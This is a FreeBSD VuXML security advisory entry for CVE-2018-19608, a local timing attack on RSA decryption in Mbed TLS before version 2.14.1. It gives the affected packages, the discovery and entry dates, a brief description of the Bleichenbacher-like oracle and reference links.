FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

Mbed TLS -- Local timing attack on RSA decryption

Affected packages
mbedtls < 2.14.1

Details

VuXML ID 293f40a0-ffa1-11e8-b258-0011d823eebd
Discovery 2018-11-28
Entry 2018-12-14

Janos Follath reports:

An attacker who can run code on the same machine that is performing an RSA decryption can potentially recover the plaintext through a Bleichenbacher-like oracle.

[source]

References

CVE Name CVE-2018-19608
URL https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2018-03

Copyright © 2003-2005 Jacques Vidrine and contributors.
Please see the source of this document for full copyright information.